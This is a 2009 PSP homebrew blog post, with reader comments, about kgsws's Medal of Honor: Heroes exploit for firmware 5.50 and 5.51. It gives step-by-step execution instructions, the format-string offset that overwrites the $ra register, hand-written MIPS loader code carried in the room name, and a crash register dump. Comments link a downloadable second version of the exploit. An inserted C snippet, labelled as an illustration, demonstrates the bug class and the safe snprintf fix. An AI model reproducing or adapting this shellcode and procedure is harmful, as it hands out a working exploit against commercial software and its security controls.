Firmware 5.50 and 5.51 owners – don’t give up hope just yet: a working exploit has been found in Medal of Honor: Heroes. (Just watch the YouTube video above.) It surfaced on the DCEmu forums a few days ago. Like the other exploits, this one wasn’t thought to be of any use to us, but unlike the others, this one does work.
Thanks to kgsws for getting this far with a working exploit for 5.50 & 5.51 users.
Notes:
More info: Do not change room name to “lb” manually, use nitePR cheat to do it.
Tested on (and works):
- PSP-1000 (M33)
- PSP-3000 (CFW enabler)
EDIT:
It was tested on PSP-1000 with official firmware 5.51, it works.
It should work on PSP-3000 too.
*Sit back and watch the Medal of Honor: Heroes price soar on eBay and Amazon….
Source: DCEmu
MOHH (1) exploit by kgsws
What you need:
- CFW PSP (can be far away, this exploit works over net)
- NON-CFW PSP
- WiFi net (both PSP)
for CFW-PSP:
- nitePR plugin
for NON-CFW PSP:
- MOHH (1) UMD
How to do it (CFW PSP):
- install nitePR
- copy ULUS-10141.txt to nitePR folder
- enable nitePR plugin
- run game, join infrastructure
- switch to “create server” section
- activate cheat “Room name run:ms0:/hx”
- start server
- before joining as player activate cheat “Player name run:ms0:/hx”
- wait for second player
- end
How to do it (NON-CFW PSP):
- copy file “hx” to memory stick root (you can copy entire ms0 folder)
- run MOHH (1)
- join infrastructure
- wait until CFW PSP creates server
- join game called “lb”
- find first player
- aim at first player
- that should be all
For now it is untested on NON-CFW PSP, try it if you can …
Some info:
Player name is vulnerable to format-string exploit.
You can’t have player name too long, format-string exploit is only way.
If you put exactly 880 characters in name (by format-string), next 4 characters will overwrite $ra register.
OK, 880 characters only for on-aim exploit.
Exploit code is stored in room name, new $ra points here.
Exploit code just loads ms0:/hx.
Room name is also limited in size, you can put there only 35 characters (no ‘\0’).
I used old game registers to get loader working.
This trick is limited, it loads only 62064b to address 0x08E3227C, but it executes it from 0x08E3228C, that means first 4 instructions won’t be executed.
File ms0:/hx must be big, because of PSP’s cache, so when you compile your own, append some chars at end.
Same bug might be in MOHH 2, but not tested.
Room name code (addresses on execution):
#addr 0x08E32270
addi $a0, $a0, 0x626C # *path
#addr 0x08E32274
jal 0x08C92BE4
#addr 0x08E32278
li $a1, 0x0801 # flags (PSP_O_RDONLY | PSP_O_EXCL)
#addr 0x08E3227C
ori $a1, $ra, 0x227C
#addr 0x08E32280
andi $a2, $sp, 0xFFFF
#addr 0x08E32284
jal 0x08C92B94
#addr 0x08E32288
andi $a0, $v0, 0xFFFF
#addr 0x08E3228C
# ms0:
#addr 0x08E32290
# /hx
Registers on crash (new $ra):
zr:0x00000000 at:0x08C3BB58 v0:0x12000000 v1:0x08D10000
a0:0x08E2C020 a1:0x00000000 a2:0x08EC5BB0 a3:0x00003670
t0:0xD6000000 t1:0x47000000 t2:0x0046FFFE t3:0x08EC2540
t4:0x493F4000 t5:0x4A000000 t6:0x4B000000 t7:0x08D10000
s0:0x20202020 s1:0x20202020 s2:0x20202020 s3:0x46464646
s4:0x30464646 s5:0x08D923C0 s6:0x08D906A0 s7:0x00000002
t8:0x08D0BB80 t9:0x08D0BB80 k0:0x09FFFB00 k1:0x00000000
gp:0x08D4B440 sp:0x09FFF270 fp:0x00010000 ra:0x08E32270
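An added example, not part of kgsws's notes or the original post: a minimal C illustration of why a length-limited name can still overrun a fixed buffer once it is used as the format argument, next to the hardened call that fixes the bug class. The 32-byte buffer, the function names and the sample name "%880d" are assumptions for illustration; the page gives neither the game's code nor the actual name string.

```c
#include <stdio.h>
#include <string.h>

#define NAME_BUF 32  /* hypothetical size of a fixed on-stack name buffer */

/* Number of bytes the vulnerable pattern sprintf(buf, name) would try to
   write. Measured with snprintf(NULL, 0, ...), so nothing is overflowed.
   The dummy int argument keeps a single %d conversion well defined. */
int expanded_len_as_format(const char *name)
{
    return snprintf(NULL, 0, name, 0);
}

/* Hardened form: the name is data, never the format string, and the
   output is bounded by the destination size.
   Returns 1 if the whole name fit, 0 if it was truncated. */
int render_name_safe(char *dst, size_t dstsz, const char *name)
{
    int n = snprintf(dst, dstsz, "%s", name);
    return n >= 0 && (size_t)n < dstsz;
}

int main(void)
{
    const char *name = "%880d";  /* constructed sample: 5 bytes as typed */
    char buf[NAME_BUF];

    printf("name as typed : %zu bytes\n", strlen(name));
    printf("used as format: %d bytes into a %d-byte buffer\n",
           expanded_len_as_format(name), NAME_BUF);

    int fit = render_name_safe(buf, sizeof buf, name);
    printf("used as data  : \"%s\" (fit=%d)\n", buf, fit);
    return 0;
}
```

A length check on the name field does not help here, because the expansion happens at print time; the fix is a constant format string plus a bounded write.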
July 9, 2009 at 8:21 am
Hmm lets see where this exploit takes us
July 10, 2009 at 6:08 pm
i dont know BUT WHAT HAPPENS WHEN YOUR PSP IS BRICKED? AND HOW DO YOU BRICK YOUR PSP?
IVE HEARD MANY PEOPLE TALKING ABOUT THEIR BRICKD PSPs
July 17, 2009 at 8:36 pm
This exploit is good. I respect Kgsws. But what we are really waiting for, is that we need this exploit to have some chickHen R2 running and etc. Or otherwise, this exploit is just like a Hello World exploit.
July 9, 2009 at 8:40 am
lots of exploits are taking place these days.
July 9, 2009 at 8:48 am
3rd..yay..actually im not getting excited about this exploit its the real deal that matters to me..
July 9, 2009 at 9:05 am
Well apparently this one is the real deal..
July 9, 2009 at 9:27 am
I’ve been waiting for so long. The future looks bright now.
July 9, 2009 at 10:30 am
It Works It Really WORKS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
July 10, 2009 at 10:16 pm
Have you done it? I have Medal of Honor Heroes 1 and a psp 3000 with 5.50 can you help me do this exploit my username is dtd747 any one with this game and CFW add me as a friend
July 9, 2009 at 11:45 am
UPDATE:
Medal of Honor Heroes second exploit
There is new version of old exploit …
What’s new?
Now you don’t need WiFi connection and CFW PSP.
It also take much less time to run.
Download here: http://zdoom.ic.cz/psp/moh-exploit-v2.zip
… and read info.txt …
July 9, 2009 at 11:46 am
Medal of Honor Heroes second exploit
There is new version of old exploit …
What’s new?
Now you don’t need WiFi connection and CFW PSP.
It also take much less time to run.
Download here: http://zdoom.ic.cz/psp/moh-exploit-v2.zip
… and read info.txt …
July 9, 2009 at 12:41 pm
AWESOME good luck to those unlucky people who updated to 5.50 and 5.51 then heard about 5.03 and just shat themselves
July 9, 2009 at 1:13 pm
this site is a bit slow….this was up at Dark_Alex forums few days ago….
July 9, 2009 at 1:17 pm
Well we didn’t post it till it was proven to work, that’s why.
July 9, 2009 at 4:05 pm
oh thats why. because other website been had these.
July 9, 2009 at 1:14 pm
damnit i got every thing except the MOHH
July 9, 2009 at 1:37 pm
there is second exploit it works with ad hoc and without cfw psp
July 9, 2009 at 2:54 pm
what!!!!! Show ME NOWWWWWW
Pleaseeeee
July 9, 2009 at 3:35 pm
for some reason I’m not allowed to post links here-whenever I try it says:
Your comment is awaiting moderation.
and it never been posted so try using google-in the english part of the forum of DAX is link too
July 9, 2009 at 2:10 pm
don’t got the MOHH either yo. . .tsk
July 9, 2009 at 2:56 pm
sad i dont have a second psp or a friend who has one with cfw
very sad
July 9, 2009 at 2:57 pm
Still though, Bright Future!!!
HAPPY AND SAD
July 9, 2009 at 3:37 pm
there is ad hoc version that doesn’t require CFW PSP
July 9, 2009 at 3:36 pm
looks like not all hope is lost. good luck to all who try, i might even set a server up just for I have MOHH and cfw : )
July 9, 2009 at 3:49 pm
i posted the second exploit in the forum. . .
check it if your interested. . .
July 9, 2009 at 3:58 pm
I have 2 questions:
1.) Is this a HOMEBREW or a CFW?
2.) If its a HOMEBREW, can we use CFW ENABLER?
July 9, 2009 at 4:08 pm
how do you get another CFW player through online?
July 9, 2009 at 4:18 pm
you the second exploit -it doesn’t require the other psp
July 9, 2009 at 5:06 pm
what can this exploit do?
July 9, 2009 at 5:15 pm
for now almost nothing but the HEN for 5.03 can be compiled so that it works with this and 5.50 users will be able to use homebrews and after that when new cfwe be done even iso games
July 9, 2009 at 6:13 pm
AHHHHHHHHHHHHH I HAVE MEDAL OF HONOR HEROES 2!!!!!
July 9, 2009 at 6:45 pm
It was said that it’s quite possible to have similar overflow in MOH 2 but I assume that should be made another save game for it
July 9, 2009 at 6:23 pm
http://pspslimhacks.com/forum/psp-developer-board/second-mohh-exploit/
I dont even know if this works so emmmm…….
Why dont they make an Exploit, that doesnt require a silly game.
August 12, 2009 at 9:42 am
its hard to find one even with a game, how do you suspect people to make an exploit without a game so easily?
this is great to have one at all
July 9, 2009 at 8:06 pm
plugins manager brick my psp 3004
plz help me can i unbrick my psp 3004
July 9, 2009 at 8:24 pm
can this work on psp 200 v3
July 9, 2009 at 9:15 pm
i got psp 2000 american and lego batman wen i pley it then turn it off the screen tuns dark and the power light keeps flashing for about 15 seconds if i press and hold buttons it flashes longer im on firmware 4.05 plz tel me thats normal
July 9, 2009 at 9:17 pm
plz tell me
July 9, 2009 at 10:25 pm
firmware is damaged a bit i think. . .
guess its normal though. . .
July 9, 2009 at 10:39 pm
i dont now cuz updated it from the game update to play hmm
July 9, 2009 at 11:48 pm
Bad things always happen to me. The day my psp is stolen, a working exploit is found for it. But the real funny thing is that i had Medal of Honor in my psp at the time. lmao, I have to laugh and then sigh.
July 10, 2009 at 2:25 am
lol u and me both man mine was stolen just as CFE came out for 3k lol but i got mine back thru the coppers
July 10, 2009 at 2:42 am
Seems like there are a lot of PSP thieves on the prowl. Better keep mine locked up =D
July 10, 2009 at 12:06 am
I don’t get it. ( Sorry for sounding stupid, but ) What’s this exploit suppose to do, exactly? Does it run 5.51 CFW or something? Isn’t OFW 5.51 hackable through normal means though, like through the use of a Pandora’s Battery and Magi Memory Stick combo?
July 10, 2009 at 12:08 am
Oh yeah, and if this IS the only way to run 5.51 CFW, can the exploit be done with a Medal of Honor Heroes ISO?
July 10, 2009 at 12:29 am
do ure research before posting comments………..u cant use pandora battery on these new psp’s (psp 2K with ta-088v3 mobo and psp 3K)…..which is why people are trying to find exploits……there is no 5.51cfw only 5.00m33-6 for pandorable psp’s and 5.03m33-6/MHU for psp’s with cfe
July 10, 2009 at 6:22 am
So are you saying Pandora’s Battery is only good up to 5.00 CFW?? BTW, I couldn’t care less if you can Pandora PSPs ta-088v3 or later, I already fucking knew that.
July 10, 2009 at 6:23 am
can’t*
July 13, 2009 at 6:51 am
I am saying that pandora battery only works on psp phat and psp 2000 slim that dont have the ta-088v3 mobo (actually there is also ta-090v2 mobo in slims, which is not pandorable but through exploits it has permanent cfw)…….btw u CANNOT use pandora on psp’s ta-088v3
July 10, 2009 at 2:31 am
lolz i’m not surprised that games so messed up in the first place
July 10, 2009 at 3:01 am
ITS JUST AN EXPLOIT, I THOUGHT THAT MY PSP 3K V5.5 WAS GONNA BE HACKED, THE GOOD NEWS IS THAT I HAVE TWO PSPs 3K THE BAD NEWS IS THAT ONE IS CFW AND ONE IS OFW
July 10, 2009 at 8:06 am
your good to go if you have the game. the one that doesnt have cfw can get it now
July 10, 2009 at 3:45 am
What do you do when you are on the kgsws menu thing?
July 10, 2009 at 6:28 am
My PSP is bricked. So I really don’t care much about it. Sure. If 5.50 and 5.51 get hacked and the mysterious 5.55 comes into the US and gets hacked, Sure I will buy a PSP 3000 and wait ’til the rumored PSP Go comes out.
July 10, 2009 at 3:56 pm
It’s not rumored. It’s coming out in October.
July 10, 2009 at 9:29 am
can i unbrick my psp 3004
plz reply me!!!
July 10, 2009 at 9:19 pm
go to forums and look for topic about unbricking psp. its a sticky topic.
July 10, 2009 at 4:45 pm
so i got to buy this game?
July 11, 2009 at 3:07 am
this is not really a usable hack yet, but it is promising. google pspgen (translate as the site is in french), or try quickjumpdotnet there is a newer version that does not need two psps, but still needs medal of honor us version. problem is that this cant actually do anything yet. it is just an opening for something to happen, maybe.
if you have firmware 5.03 stay there. if you have 5.50 or 5.51, for gods sake, do not upgrade. and if you do dont ever come back to these forums and ask, will this hack work on ofw 5.52 or whatever is next because sony always closes holes with every firmware update.
if im not mistaken the chickhen came about through research into the gripshift hole, so just wait, maybe this will be something someday. but i remember when that exploit was found everyone was advised not to update past ofw 5.02, but apparently a lot of you did. dont do it again as these holes are harder to find every time sony releases a new firmware.
July 20, 2009 at 12:26 am
kay well… not everyone knew of the advice.. so you can’t blame them for updating to 5.50 or 5.51.
and another thing… for the people who make cfw and everything.. they should focus more on cfw for 5.50 or 5.51.. so that people like me, would stop complaining..:’(
July 11, 2009 at 5:37 pm
I hope they’re gonna work fast on making this hack work on 5.50 without the game.
I just bought my PSP 3 days ago, so I never really had a choice as whether to upgrade the firmware or not, seeing how it came with 5.50 already installed.
July 11, 2009 at 10:43 pm
I think the answer to the blocking of psn may be DAVEE!!!!. If he could put iso/cso support in chickhen, sony hasn’t blocked that. If he could release R3, that may be the answer……
July 12, 2009 at 12:24 am
PSN works on 5.50genb, davee didnt put iso support in chickhen, and sony immediately patched the chickhen tiff exploit, but other than that great post…
July 13, 2009 at 6:51 pm
they didnt “immediately” patch it
for some reason, sony waited 3 years after the very first tiff exploit
July 12, 2009 at 12:27 am
now… when the exploit has a working hen… I’ll get the game… my 3K is hungry for Gex and Croc!
July 12, 2009 at 12:57 am
They might start patching medal of honor soon!
July 12, 2009 at 2:52 am
they can’t patch a game you idiot. . .
they’ll patch the next firmware. . .
July 12, 2009 at 3:29 am
They can’t patch the game but they might patch the online multiplayer server and we know it’s possible..
July 12, 2009 at 9:28 am
yep but the second exploit works with ad hoc-how do they patch this
:D:D
July 12, 2009 at 3:44 am
crap… DAVEE HELP ME!!!!!!!!!!!!
July 12, 2009 at 7:16 am
even if they patch the server(which i doubt they could since its the game were using). . .
theres an offline method. . .
i posted it in the forum the day this was released. . .
July 12, 2009 at 4:36 pm
well… I’ll go to gamestop and get it when there’s a hen…
July 12, 2009 at 8:59 pm
sweet this game was the first game i ever purchased when i bought my psp slim almost two years ago thankfully it was hackable and i have the hell outta this game. I love medal of honor heroes!
July 13, 2009 at 4:26 pm
when in the menu. . .
what do i do next?
July 13, 2009 at 5:47 pm
it is just an Exploit, Idiot.
July 13, 2009 at 11:05 pm
lol flamez i guess that makes u and errol even, idiot
July 14, 2009 at 9:39 am
this post has the most replies in the shortest time of any topic
about 30 replies in 4 hrs
July 15, 2009 at 7:31 pm
can this exploit work for medal of honor heroes 2??????
July 18, 2009 at 4:42 am
i think so. . .not sure as yet though
July 18, 2009 at 6:21 pm
in what folder i have to put the exploit??????